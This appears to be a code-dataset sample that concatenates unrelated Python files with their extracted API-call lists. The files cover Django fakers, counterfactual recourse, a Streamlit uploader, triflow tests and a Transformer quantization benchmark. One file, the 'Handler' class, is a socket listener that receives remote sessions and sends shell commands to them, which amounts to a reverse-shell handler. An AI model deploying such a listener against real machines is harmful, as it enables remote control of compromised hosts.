field_faker_map = BASE_FIELD_FAKER_MAP.copy()
field_faker_map.update(base_field_faker_map)
return field_faker_map
FIELD_FAKER_MAP = get_field_faker_map()
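# Hedged illustration (editor's addition, not part of the original module): a minimal
# custom faker built from the documented extension points (faker_class, faker_kwargs,
# provider). "color_name" is a standard Faker provider; a project would register the
# class by pointing the FACTORY_FIELD_FAKER_MAP setting at its dotted path.
class ExampleColorFieldFaker(FieldFaker):
    faker_class = "factory.Faker"
    faker_kwargs = ["provider"]
    provider = "color_name"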
|
[
"django.template.loader.render_to_string",
"faker.Faker"
] |
[((1115, 1160), 'django.template.loader.render_to_string', 'render_to_string', (['self.template', 'self.context'], {}), '(self.template, self.context)\n', (1131, 1160), False, 'from django.template.loader import render_to_string\n'), ((9195, 9202), 'faker.Faker', 'Faker', ([], {}), '()\n', (9200, 9202), False, 'from faker import Faker\n')]
|
import os
import time
import numpy as np
import pandas as pd
import normalizedDistance
from pprint import pprint
from recourse.builder import RecourseBuilder
from recourse.builder import ActionSet
def genExp(model_trained, factual_sample, norm_type, dataset_obj):
start_time = time.time()
# SIMPLE HACK!!
# ActionSet() construction demands that all variables have a range to them. In
# the case of one-hot ordinal variables (e.g., x2_ord_0, x2_ord_1, x2_ord_2)),
# the first sub-category (i.e., x2_ord_0) will always have range(1,1), failing
# the requirements of ActionSet(). Therefore, we add a DUMMY ROW to the data-
# frame, which is a copy of another row (so not to throw off the range of other
# attributes), but setting a 0 value to all _ord_ variables. (might as well do
# this for all _cat_ variables as well).
tmp_df = dataset_obj.data_frame_kurz
sample_row = tmp_df.loc[0].to_dict()
for attr_name_kurz in dataset_obj.getOneHotAttributesNames('kurz'):
sample_row[attr_name_kurz] = 0
tmp_df = tmp_df.append(pd.Series(sample_row), ignore_index=True)
df = tmp_df
X = df.loc[:, df.columns != 'y']
# Enforce binary, categorical (including ordinal) variables only take on 2 values
custom_bounds = {attr_name_kurz: (0, 100, 'p') for attr_name_kurz in np.union1d(
dataset_obj.getOneHotAttributesNames('kurz'),
dataset_obj.getBinaryAttributeNames('kurz')
)}
action_set = ActionSet(X = X, custom_bounds = custom_bounds)
# action_set['x1'].mutable = False # x1 = 'Race'
# In the current implementation, we only supports any/none actionability
for attr_name_kurz in dataset_obj.getInputAttributeNames('kurz'):
attr_obj = dataset_obj.attributes_kurz[attr_name_kurz]
if attr_obj.actionability == 'none':
action_set[attr_name_kurz].mutable = False
elif attr_obj.actionability == 'any':
continue # do nothing
else:
raise ValueError(f'Actionable Recourse does not support actionability type {attr_obj.actionability}')
# Enforce search over integer-based grid for integer-based variables
for attr_name_kurz in np.union1d(
dataset_obj.getIntegerBasedAttributeNames('kurz'),
dataset_obj.getBinaryAttributeNames('kurz'),
):
action_set[attr_name_kurz].step_type = "absolute"
action_set[attr_name_kurz].step_size = 1
coefficients = model_trained.coef_[0]
intercept = model_trained.intercept_[0]
if norm_type == 'one_norm':
mip_cost_type = 'total'
elif norm_type == 'infty_norm':
mip_cost_type = 'max'
else:
raise ValueError(f'Actionable Recourse does not support norm_type {norm_type}')
factual_sample_values = list(factual_sample.values())
# p = .8
rb = RecourseBuilder(
optimizer="cplex",
coefficients=coefficients,
intercept=intercept, # - (np.log(p / (1. - p))),
action_set=action_set,
x=factual_sample_values,
mip_cost_type=mip_cost_type
)
output = rb.fit()
counterfactual_sample_values = np.add(factual_sample_values, output['actions'])
counterfactual_sample = dict(zip(factual_sample.keys(), counterfactual_sample_values))
# factual_sample['y'] = False
# counterfactual_sample['y'] = True
counterfactual_sample['y'] = not factual_sample['y']
counterfactual_plausible = True
# IMPORTANT: no need to check for integer-based / binary-based plausibility,
# because those were set above when we said step_type = absolute! Just round!
for attr_name_kurz in np.union1d(
dataset_obj.getOneHotAttributesNames('kurz'),
dataset_obj.getBinaryAttributeNames('kurz')
):
try:
assert np.isclose(
counterfactual_sample[attr_name_kurz],
np.round(counterfactual_sample[attr_name_kurz])
)
counterfactual_sample[attr_name_kurz] = np.round(counterfactual_sample[attr_name_kurz])
except:
distance = -1
counterfactual_plausible = False
# return counterfactual_sample, distance
# Perform plausibility-data-type check! Remember, all ordinal variables
# have already been converted to categorical variables. It is important now
# to check that 1 (and only 1) sub-category is activated in the resulting
# counterfactual sample.
already_considered = []
for attr_name_kurz in dataset_obj.getOneHotAttributesNames('kurz'):
if attr_name_kurz not in already_considered:
siblings_kurz = dataset_obj.getSiblingsFor(attr_name_kurz)
activations_for_category = [
counterfactual_sample[attr_name_kurz] for attr_name_kurz in siblings_kurz
]
sum_activations_for_category = np.sum(activations_for_category)
if 'cat' in dataset_obj.attributes_kurz[attr_name_kurz].attr_type:
if sum_activations_for_category == 1:
continue
else:
# print('not plausible, fixing..', end='')
# TODO: don't actually return early! Instead see the actual distance,
# fingers crossed that we can say that not only is their method giving
# counterfactuals are larger distances, but in a lot of cases they are
# not data-type plausible
# INSTEAD, do below:
# Convert to correct categorical/ordinal activations so we can
# compute the distance using already written function.
# Turns out we need to do nothing, because the distance between
# [0,1,0] and anything other than itself, (e.g., [1,1,0] or [1,0,1])
# is always 1 :)
# continue
distance = -1
counterfactual_plausible = False
# return counterfactual_sample, distance
elif 'ord' in dataset_obj.attributes_kurz[attr_name_kurz].attr_type:
# TODO: assert activations are in order...
# if not, repeat as above...
for idx in range(int(sum_activations_for_category)):
if activations_for_category[idx] != 1:
# Convert to correct categorical/ordinal activations so we can
# compute the distance using already written function.
# Find the max index of 1 in the array, and set everything before that to 1
# print('not plausible, fixing..', end='')
# max_index_of_1 = np.where(np.array(activations_for_category) == 1)[0][-1]
# for idx2 in range(max_index_of_1 + 1):
# counterfactual_sample[siblings_kurz[idx2]] = 1
# break
distance = -1
counterfactual_plausible = False
# return counterfactual_sample, distance
else:
raise Exception(f'{attr_name_kurz} must include either `cat` or `ord`.')
already_considered.extend(siblings_kurz)
# TODO: convert to correct categorical/ordinal activations so we can compute
# distance = output['cost'] # TODO: this must change / be verified!???
distance = normalizedDistance.getDistanceBetweenSamples(
factual_sample,
counterfactual_sample,
norm_type,
dataset_obj
)
  # # TODO: post-feasible needed???? NO
# # make plausible by rounding all non-numeric-real attributes to
# # nearest value in range
# for idx, elem in enumerate(es_instance):
# attr_name_kurz = dataset_obj.getInputAttributeNames('kurz')[idx]
# attr_obj = dataset_obj.attributes_kurz[attr_name_kurz]
# if attr_obj.attr_type != 'numeric-real':
# # round() might give a value that is NOT in plausible.
# # instead find the nearest plausible value
# es_instance[idx] = min(
# list(range(int(attr_obj.lower_bound), int(attr_obj.upper_bound) + 1)),
# key = lambda x : abs(x - es_instance[idx])
# )
end_time = time.time()
return {
'factual_sample': factual_sample,
'cfe_sample': counterfactual_sample,
'cfe_found': True, # TODO?
'cfe_plausible': counterfactual_plausible,
'cfe_distance': distance,
'cfe_time': end_time - start_time,
}
|
[
"numpy.sum",
"time.time",
"normalizedDistance.getDistanceBetweenSamples",
"recourse.builder.ActionSet",
"pandas.Series",
"numpy.add",
"recourse.builder.RecourseBuilder",
"numpy.round"
] |
[((282, 293), 'time.time', 'time.time', ([], {}), '()\n', (291, 293), False, 'import time\n'), ((1428, 1471), 'recourse.builder.ActionSet', 'ActionSet', ([], {'X': 'X', 'custom_bounds': 'custom_bounds'}), '(X=X, custom_bounds=custom_bounds)\n', (1437, 1471), False, 'from recourse.builder import ActionSet\n'), ((2692, 2860), 'recourse.builder.RecourseBuilder', 'RecourseBuilder', ([], {'optimizer': '"""cplex"""', 'coefficients': 'coefficients', 'intercept': 'intercept', 'action_set': 'action_set', 'x': 'factual_sample_values', 'mip_cost_type': 'mip_cost_type'}), "(optimizer='cplex', coefficients=coefficients, intercept=\n intercept, action_set=action_set, x=factual_sample_values,\n mip_cost_type=mip_cost_type)\n", (2707, 2860), False, 'from recourse.builder import RecourseBuilder\n'), ((2986, 3034), 'numpy.add', 'np.add', (['factual_sample_values', "output['actions']"], {}), "(factual_sample_values, output['actions'])\n", (2992, 3034), True, 'import numpy as np\n'), ((6797, 6908), 'normalizedDistance.getDistanceBetweenSamples', 'normalizedDistance.getDistanceBetweenSamples', (['factual_sample', 'counterfactual_sample', 'norm_type', 'dataset_obj'], {}), '(factual_sample,\n counterfactual_sample, norm_type, dataset_obj)\n', (6841, 6908), False, 'import normalizedDistance\n'), ((7628, 7639), 'time.time', 'time.time', ([], {}), '()\n', (7637, 7639), False, 'import time\n'), ((1050, 1071), 'pandas.Series', 'pd.Series', (['sample_row'], {}), '(sample_row)\n', (1059, 1071), True, 'import pandas as pd\n'), ((3774, 3821), 'numpy.round', 'np.round', (['counterfactual_sample[attr_name_kurz]'], {}), '(counterfactual_sample[attr_name_kurz])\n', (3782, 3821), True, 'import numpy as np\n'), ((4568, 4600), 'numpy.sum', 'np.sum', (['activations_for_category'], {}), '(activations_for_category)\n', (4574, 4600), True, 'import numpy as np\n'), ((3672, 3719), 'numpy.round', 'np.round', (['counterfactual_sample[attr_name_kurz]'], {}), '(counterfactual_sample[attr_name_kurz])\n', (3680, 3719), True, 'import numpy as np\n')]
|
import streamlit as st
from code import helpers
import pandas as pd
st.title("Datos")
st.markdown("Cargue un archivo de datos en formato Fishtalk para su procesamiento.")
c1, c2, c3 = st.columns([3,1,3])
# Upload button
upload_text = "Cargar archivo"
uploaded_file = c1.file_uploader(upload_text)
# Work and use a progress bar
if uploaded_file:
# Save the file
input_excel_filepath = "xlsx_data/" + uploaded_file.name
with open(input_excel_filepath, "wb") as f:
f.write(uploaded_file.read())
# Download the processed file
info_box = st.empty()
with st.spinner():
info_box.info("Procesando archivo...")
output_excel_filepath = helpers.clean_file(input_excel_filepath)
info_box.empty()
c3.markdown("\n")
c3.markdown("Descargar versión procesada")
filename = output_excel_filepath.split("/")[-1]
with open(output_excel_filepath, "rb") as fh:
btn = c3.download_button(
label="Download file",
data=fh,
file_name=filename,
)
# Load the data into a dataframe
st.session_state.df = pd.read_excel(output_excel_filepath)
st.info("Archivo cargado y listo para visualizar.")
|
[
"streamlit.markdown",
"streamlit.columns",
"streamlit.spinner",
"streamlit.title",
"code.helpers.clean_file",
"pandas.read_excel",
"streamlit.info",
"streamlit.empty"
] |
[((70, 87), 'streamlit.title', 'st.title', (['"""Datos"""'], {}), "('Datos')\n", (78, 87), True, 'import streamlit as st\n'), ((89, 178), 'streamlit.markdown', 'st.markdown', (['"""Cargue un archivo de datos en formato Fishtalk para su procesamiento."""'], {}), "(\n 'Cargue un archivo de datos en formato Fishtalk para su procesamiento.')\n", (100, 178), True, 'import streamlit as st\n'), ((188, 209), 'streamlit.columns', 'st.columns', (['[3, 1, 3]'], {}), '([3, 1, 3])\n', (198, 209), True, 'import streamlit as st\n'), ((568, 578), 'streamlit.empty', 'st.empty', ([], {}), '()\n', (576, 578), True, 'import streamlit as st\n'), ((1130, 1166), 'pandas.read_excel', 'pd.read_excel', (['output_excel_filepath'], {}), '(output_excel_filepath)\n', (1143, 1166), True, 'import pandas as pd\n'), ((1171, 1222), 'streamlit.info', 'st.info', (['"""Archivo cargado y listo para visualizar."""'], {}), "('Archivo cargado y listo para visualizar.')\n", (1178, 1222), True, 'import streamlit as st\n'), ((588, 600), 'streamlit.spinner', 'st.spinner', ([], {}), '()\n', (598, 600), True, 'import streamlit as st\n'), ((681, 721), 'code.helpers.clean_file', 'helpers.clean_file', (['input_excel_filepath'], {}), '(input_excel_filepath)\n', (699, 721), False, 'from code import helpers\n')]
|
import socket
import threading
import time
import logging
class Handler(threading.Thread):
def __init__(self, port):
threading.Thread.__init__(self)
logging.info(f"Handler listening on 0.0.0.0:{port}")
self.connected = False
self.port = int(port)
def run(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind(('', self.port))
while True:
self.socket.listen(5)
self.client, address = self.socket.accept()
print(f"Handler> New session from {address[0]}")
self.connected = True
response = self.client.recv(255)
while response != b"":
print(f"\n{response.decode('utf_8', 'ignore').strip()}\nShell > $ ", end='')
response = self.client.recv(255)
def listen_command(self):
if self.connected == True:
cmd = input("Shell> $ ")
if cmd == "exit":
self.kill()
print("BYE !")
exit()
self.send_command(cmd+"\n\n")
def send_command(self, cmd):
self.client.sendall(cmd.encode())
def kill(self):
self.client.close()
self.socket.close()
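# Hedged usage sketch (editor's addition, not in the original file): start the listener
# thread, then poll for operator commands once a client has connected.
if __name__ == "__main__":
    handler = Handler(4444)            # 4444 is an arbitrary example port
    handler.start()                     # run() binds the socket and waits for a client
    while True:
        if handler.connected:
            handler.listen_command()    # prompts "Shell> $ " and forwards the command
        else:
            time.sleep(1)               # sleep until a client connects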
|
[
"logging.info",
"threading.Thread.__init__",
"socket.socket"
] |
[((131, 162), 'threading.Thread.__init__', 'threading.Thread.__init__', (['self'], {}), '(self)\n', (156, 162), False, 'import threading\n'), ((171, 223), 'logging.info', 'logging.info', (['f"""Handler listening on 0.0.0.0:{port}"""'], {}), "(f'Handler listening on 0.0.0.0:{port}')\n", (183, 223), False, 'import logging\n'), ((327, 376), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (340, 376), False, 'import socket\n')]
|
#!/usr/bin/env python
# coding=utf8
import os
import matplotlib as mpl
import numpy as np
import path
import pytest
from triflow import Model, Simulation, display_fields, display_probe # noqa
if os.environ.get('DISPLAY', '') == '':
print('no display found. Using non-interactive Agg backend')
mpl.use('Agg')
@pytest.fixture
def heat_model():
model = Model(differential_equations="k * dxxT",
dependent_variables="T",
parameters="k", compiler="numpy")
return model
@pytest.fixture
def simul(heat_model):
x, dx = np.linspace(0, 10, 50, retstep=True, endpoint=False)
T = np.cos(x * 2 * np.pi / 10)
initial_fields = heat_model.fields_template(x=x, T=T)
parameters = dict(periodic=True, k=1)
simul = Simulation(heat_model, initial_fields, parameters,
dt=.5, tmax=2, tol=1E-1)
return simul
def test_display_fields(simul):
display_fields(simul)
simul.run()
def test_display_probes(simul):
display_probe(simul, function=lambda simul: simul.timer.total)
simul.run()
def test_display_mul(simul):
display_fields(simul) * display_fields(simul)
display_fields(simul) * display_fields(simul).hv_curve
def test_display_add(simul):
display_fields(simul) + display_fields(simul)
display_fields(simul) + display_fields(simul).hv_curve
@pytest.mark.parametrize("fmt",
["png", "svg", "pdf"])
def test_display_fields_on_disk(simul, fmt):
with path.tempdir() as d:
display = display_fields(simul, on_disk=d, fmt=fmt)
simul.run()
[process.join() for process in display._writers]
assert len(d.glob("*.%s" % fmt)) == 5
@pytest.mark.parametrize("fmt",
["png", "svg", "pdf"])
def test_display_probles_on_disk(simul, fmt):
with path.tempdir() as d:
display = display_probe(simul,
function=lambda simul: simul.timer.total,
on_disk=d, fmt=fmt)
simul.run()
[process.join() for process in display._writers]
assert len(d.glob("*.%s" % fmt)) == 5
def test_display_api(simul):
display = display_fields(simul)
display.hv_curve
|
[
"triflow.Model",
"triflow.display_probe",
"path.tempdir",
"os.environ.get",
"triflow.display_fields",
"matplotlib.use",
"triflow.Simulation",
"numpy.linspace",
"numpy.cos",
"pytest.mark.parametrize"
] |
[((1367, 1420), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""fmt"""', "['png', 'svg', 'pdf']"], {}), "('fmt', ['png', 'svg', 'pdf'])\n", (1390, 1420), False, 'import pytest\n'), ((1707, 1760), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""fmt"""', "['png', 'svg', 'pdf']"], {}), "('fmt', ['png', 'svg', 'pdf'])\n", (1730, 1760), False, 'import pytest\n'), ((200, 229), 'os.environ.get', 'os.environ.get', (['"""DISPLAY"""', '""""""'], {}), "('DISPLAY', '')\n", (214, 229), False, 'import os\n'), ((306, 320), 'matplotlib.use', 'mpl.use', (['"""Agg"""'], {}), "('Agg')\n", (313, 320), True, 'import matplotlib as mpl\n'), ((369, 472), 'triflow.Model', 'Model', ([], {'differential_equations': '"""k * dxxT"""', 'dependent_variables': '"""T"""', 'parameters': '"""k"""', 'compiler': '"""numpy"""'}), "(differential_equations='k * dxxT', dependent_variables='T',\n parameters='k', compiler='numpy')\n", (374, 472), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((575, 627), 'numpy.linspace', 'np.linspace', (['(0)', '(10)', '(50)'], {'retstep': '(True)', 'endpoint': '(False)'}), '(0, 10, 50, retstep=True, endpoint=False)\n', (586, 627), True, 'import numpy as np\n'), ((636, 662), 'numpy.cos', 'np.cos', (['(x * 2 * np.pi / 10)'], {}), '(x * 2 * np.pi / 10)\n', (642, 662), True, 'import numpy as np\n'), ((775, 850), 'triflow.Simulation', 'Simulation', (['heat_model', 'initial_fields', 'parameters'], {'dt': '(0.5)', 'tmax': '(2)', 'tol': '(0.1)'}), '(heat_model, initial_fields, parameters, dt=0.5, tmax=2, tol=0.1)\n', (785, 850), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((929, 950), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (943, 950), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1005, 1067), 'triflow.display_probe', 'display_probe', (['simul'], {'function': '(lambda simul: simul.timer.total)'}), '(simul, function=lambda simul: simul.timer.total)\n', (1018, 1067), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((2195, 2216), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (2209, 2216), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1119, 1140), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1133, 1140), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1143, 1164), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1157, 1164), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1169, 1190), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1183, 1190), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1259, 1280), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1273, 1280), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1283, 1304), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1297, 1304), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1309, 1330), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1323, 1330), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1500, 1514), 'path.tempdir', 'path.tempdir', ([], {}), '()\n', (1512, 1514), False, 'import path\n'), ((1539, 1580), 
'triflow.display_fields', 'display_fields', (['simul'], {'on_disk': 'd', 'fmt': 'fmt'}), '(simul, on_disk=d, fmt=fmt)\n', (1553, 1580), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1841, 1855), 'path.tempdir', 'path.tempdir', ([], {}), '()\n', (1853, 1855), False, 'import path\n'), ((1880, 1966), 'triflow.display_probe', 'display_probe', (['simul'], {'function': '(lambda simul: simul.timer.total)', 'on_disk': 'd', 'fmt': 'fmt'}), '(simul, function=lambda simul: simul.timer.total, on_disk=d,\n fmt=fmt)\n', (1893, 1966), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1193, 1214), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1207, 1214), False, 'from triflow import Model, Simulation, display_fields, display_probe\n'), ((1333, 1354), 'triflow.display_fields', 'display_fields', (['simul'], {}), '(simul)\n', (1347, 1354), False, 'from triflow import Model, Simulation, display_fields, display_probe\n')]
|
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import time
import sys
import numpy as np
import unicodedata
import six
import re
import tensorflow as tf
from absl import app
from argparse import ArgumentParser
import pandas as pd
from utils import tokenizer
from utils.tokenizer import Subtokenizer
from utils import metrics
flags = tf.compat.v1.flags
FLAGS = flags.FLAGS
flags.DEFINE_integer("batch_size", 64,
"run batch size")
flags.DEFINE_string("input_graph", None,
"The path of input model file.")
flags.DEFINE_string("inputs_file", None,
"File saved to an output file.")
flags.DEFINE_string("reference_file", None,
"File containing reference translation.")
flags.DEFINE_string("vocab_file", None,
"Path to subtoken vocabulary file.")
flags.DEFINE_string("config", None,
"Config json file")
flags.DEFINE_string("output_model", None,
"The output model of the quantized model.")
flags.DEFINE_string("mode", "tune",
"One of three options: 'benchmark'/'accuracy'/'tune'.")
flags.DEFINE_integer("iters", -1,
"The iteration used for benchmark.")
class UnicodeRegex(object):
def __init__(self):
punctuation = self.property_chars("P")
self.nondigit_punct_re = re.compile(r"([^\d])([" + punctuation + r"])")
self.punct_nondigit_re = re.compile(r"([" + punctuation + r"])([^\d])")
self.symbol_re = re.compile("([" + self.property_chars("S") + "])")
def property_chars(self, prefix):
return "".join(six.unichr(x) for x in range(sys.maxunicode)
if unicodedata.category(six.unichr(x)).startswith(prefix))
uregex = UnicodeRegex()
def bleu_tokenize(string):
string = uregex.nondigit_punct_re.sub(r"\1 \2 ", string)
string = uregex.punct_nondigit_re.sub(r" \1 \2", string)
string = uregex.symbol_re.sub(r" \1 ", string)
return string.split()
class bleu(object):
def __init__(self):
self.translations = []
self.labels = []
def reset(self):
self.translations = []
self.labels = []
def update(self, pred, label):
if len(label) != len(pred):
raise ValueError("Reference and translation files have different number "
"of lines. If training only a few steps (100-200), the "
"translation may be empty.")
label = [x.lower() for x in label]
pred = [x.lower() for x in pred]
label = [bleu_tokenize(x) for x in label]
pred = [bleu_tokenize(x) for x in pred]
self.labels.extend(label)
self.translations.extend(pred)
def result(self):
return metrics.compute_bleu(self.labels, self.translations) * 100
def collate_fn(batch):
"""Puts each data field into a pd frame with outer dimension batch size"""
elem = batch[0]
if isinstance(elem, tuple):
batch = zip(*batch)
return [collate_fn(samples) for samples in batch]
elif isinstance(elem, np.ndarray):
return [list(elem) for elem in batch]
elif isinstance(elem, str):
return batch
else:
return pd.DataFrame(batch).fillna(0).values.astype(np.int32)
def load_graph(file_name):
tf.compat.v1.logging.info('Loading graph from: ' + file_name)
with tf.io.gfile.GFile(file_name, "rb") as f:
graph_def = tf.compat.v1.GraphDef()
graph_def.ParseFromString(f.read())
with tf.Graph().as_default() as graph:
tf.import_graph_def(graph_def, name='')
return graph
def eval_func(infer_graph, iteration=-1):
if isinstance(infer_graph, tf.compat.v1.GraphDef):
graph = tf.Graph()
with graph.as_default():
tf.import_graph_def(infer_graph, name='')
infer_graph = graph
subtokenizer = Subtokenizer(FLAGS.vocab_file)
input_tensor = infer_graph.get_tensor_by_name('input_tensor:0')
output_tensor = infer_graph.get_tensor_by_name(\
'model/Transformer/strided_slice_19:0')
ds = Dataset(FLAGS.inputs_file, FLAGS.reference_file, FLAGS.vocab_file)
from neural_compressor.data import DATALOADERS
dataloader = DATALOADERS['tensorflow'](ds, batch_size=FLAGS.batch_size,
collate_fn=collate_fn)
config = tf.compat.v1.ConfigProto()
config.use_per_session_threads = 1
config.inter_op_parallelism_threads = 1
sess = tf.compat.v1.Session(graph=infer_graph, config=config)
time_list = []
bleu_eval = bleu()
predictions = []
labels = []
warmup = 10
if iteration != -1:
assert iteration >= warmup, 'iteration must be larger than warmup'
for idx, (input_data, label) in enumerate(dataloader):
if idx < iteration or iteration == -1:
time_start = time.time()
out = sess.run([output_tensor], {input_tensor: input_data})
duration = time.time() - time_start
time_list.append(duration)
predictions.append(out)
labels.extend(label)
else:
break
latency = np.array(time_list[warmup: ]).mean() / FLAGS.batch_size
print('Batch size = {}'.format(FLAGS.batch_size))
print('Latency: {:.3f} ms'.format(latency * 1000))
print('Throughput: {:.3f} items/sec'.format(1./ latency))
# only calculate accuracy when running out all predictions
if iteration == -1:
decode = []
for i,tr in enumerate(predictions):
for j,itr in enumerate(tr):
for k, otr in enumerate(itr):
try:
index = list(otr).index(tokenizer.EOS_ID)
decode.append(subtokenizer.decode(otr[:index]))
except:
decode.append(subtokenizer.decode(otr))
bleu_eval.update(decode, labels)
print('Accuracy is {:.3f}'.format(bleu_eval.result()))
return bleu_eval.result()
class Dataset(object):
def __init__(self, inputs_file, reference_file, vocab_file):
with tf.io.gfile.GFile(inputs_file) as f:
records = f.read().split("\n")
inputs = [record.strip() for record in records]
if not inputs[-1]:
inputs.pop()
self.ref_lines = tokenizer.native_to_unicode(
tf.io.gfile.GFile(reference_file).read()).strip().splitlines()
subtokenizer = Subtokenizer(vocab_file)
self.batch = []
token_lens=[]
for i, line in enumerate(inputs):
enc = subtokenizer.encode(line, add_eos=True)
token_lens.append((i, len(enc)))
sorted_by_token_input_lens = sorted(token_lens, key=lambda x: x[1], reverse=True)
sorted_inputs = [None] * len(sorted_by_token_input_lens)
sorted_keys = [0] * len(sorted_by_token_input_lens)
lines = []
for i, (index, _) in enumerate(sorted_by_token_input_lens):
sorted_inputs[i] = inputs[index]
sorted_keys[index] = i
enc=subtokenizer.encode(sorted_inputs[i], add_eos=True)
lines.append([enc])
for i in sorted_keys:
self.batch.append(lines[i])
def __getitem__(self, index):
data = self.batch[index]
label = self.ref_lines[index]
return data[0], label
def __len__(self):
return len(self.batch)
def main(_):
graph = load_graph(FLAGS.input_graph)
if FLAGS.mode == 'tune':
from neural_compressor.experimental import Quantization, common
quantizer = Quantization(FLAGS.config)
ds = Dataset(FLAGS.inputs_file, FLAGS.reference_file, FLAGS.vocab_file)
quantizer.calib_dataloader = common.DataLoader(ds, collate_fn=collate_fn, \
batch_size=FLAGS.batch_size)
quantizer.model = common.Model(graph)
quantizer.eval_func = eval_func
q_model = quantizer.fit()
try:
q_model.save(FLAGS.output_model)
except Exception as e:
print("Failed to save model due to {}".format(str(e)))
elif FLAGS.mode == 'benchmark':
eval_func(graph, FLAGS.iters)
elif FLAGS.mode == 'accuracy':
eval_func(graph, -1)
if __name__ == "__main__":
tf.compat.v1.app.run()
|
[
"pandas.DataFrame",
"neural_compressor.experimental.Quantization",
"tensorflow.io.gfile.GFile",
"utils.tokenizer.Subtokenizer",
"six.unichr",
"tensorflow.compat.v1.logging.info",
"time.time",
"tensorflow.compat.v1.Session",
"neural_compressor.experimental.common.Model",
"numpy.array",
"tensorflow.compat.v1.ConfigProto",
"tensorflow.Graph",
"utils.metrics.compute_bleu",
"tensorflow.import_graph_def",
"tensorflow.compat.v1.GraphDef",
"neural_compressor.experimental.common.DataLoader",
"tensorflow.compat.v1.app.run",
"re.compile"
] |
[((3905, 3966), 'tensorflow.compat.v1.logging.info', 'tf.compat.v1.logging.info', (["('Loading graph from: ' + file_name)"], {}), "('Loading graph from: ' + file_name)\n", (3930, 3966), True, 'import tensorflow as tf\n'), ((4475, 4505), 'utils.tokenizer.Subtokenizer', 'Subtokenizer', (['FLAGS.vocab_file'], {}), '(FLAGS.vocab_file)\n', (4487, 4505), False, 'from utils.tokenizer import Subtokenizer\n'), ((4958, 4984), 'tensorflow.compat.v1.ConfigProto', 'tf.compat.v1.ConfigProto', ([], {}), '()\n', (4982, 4984), True, 'import tensorflow as tf\n'), ((5079, 5133), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {'graph': 'infer_graph', 'config': 'config'}), '(graph=infer_graph, config=config)\n', (5099, 5133), True, 'import tensorflow as tf\n'), ((8950, 8972), 'tensorflow.compat.v1.app.run', 'tf.compat.v1.app.run', ([], {}), '()\n', (8970, 8972), True, 'import tensorflow as tf\n'), ((1941, 1986), 're.compile', 're.compile', (["('([^\\\\d])([' + punctuation + '])')"], {}), "('([^\\\\d])([' + punctuation + '])')\n", (1951, 1986), False, 'import re\n'), ((2021, 2066), 're.compile', 're.compile', (["('([' + punctuation + '])([^\\\\d])')"], {}), "('([' + punctuation + '])([^\\\\d])')\n", (2031, 2066), False, 'import re\n'), ((3976, 4010), 'tensorflow.io.gfile.GFile', 'tf.io.gfile.GFile', (['file_name', '"""rb"""'], {}), "(file_name, 'rb')\n", (3993, 4010), True, 'import tensorflow as tf\n'), ((4037, 4060), 'tensorflow.compat.v1.GraphDef', 'tf.compat.v1.GraphDef', ([], {}), '()\n', (4058, 4060), True, 'import tensorflow as tf\n'), ((4156, 4195), 'tensorflow.import_graph_def', 'tf.import_graph_def', (['graph_def'], {'name': '""""""'}), "(graph_def, name='')\n", (4175, 4195), True, 'import tensorflow as tf\n'), ((4327, 4337), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (4335, 4337), True, 'import tensorflow as tf\n'), ((7076, 7100), 'utils.tokenizer.Subtokenizer', 'Subtokenizer', (['vocab_file'], {}), '(vocab_file)\n', (7088, 7100), False, 'from utils.tokenizer import Subtokenizer\n'), ((8227, 8253), 'neural_compressor.experimental.Quantization', 'Quantization', (['FLAGS.config'], {}), '(FLAGS.config)\n', (8239, 8253), False, 'from neural_compressor.experimental import Quantization, common\n'), ((8371, 8444), 'neural_compressor.experimental.common.DataLoader', 'common.DataLoader', (['ds'], {'collate_fn': 'collate_fn', 'batch_size': 'FLAGS.batch_size'}), '(ds, collate_fn=collate_fn, batch_size=FLAGS.batch_size)\n', (8388, 8444), False, 'from neural_compressor.experimental import Quantization, common\n'), ((8522, 8541), 'neural_compressor.experimental.common.Model', 'common.Model', (['graph'], {}), '(graph)\n', (8534, 8541), False, 'from neural_compressor.experimental import Quantization, common\n'), ((3356, 3408), 'utils.metrics.compute_bleu', 'metrics.compute_bleu', (['self.labels', 'self.translations'], {}), '(self.labels, self.translations)\n', (3376, 3408), False, 'from utils import metrics\n'), ((4384, 4425), 'tensorflow.import_graph_def', 'tf.import_graph_def', 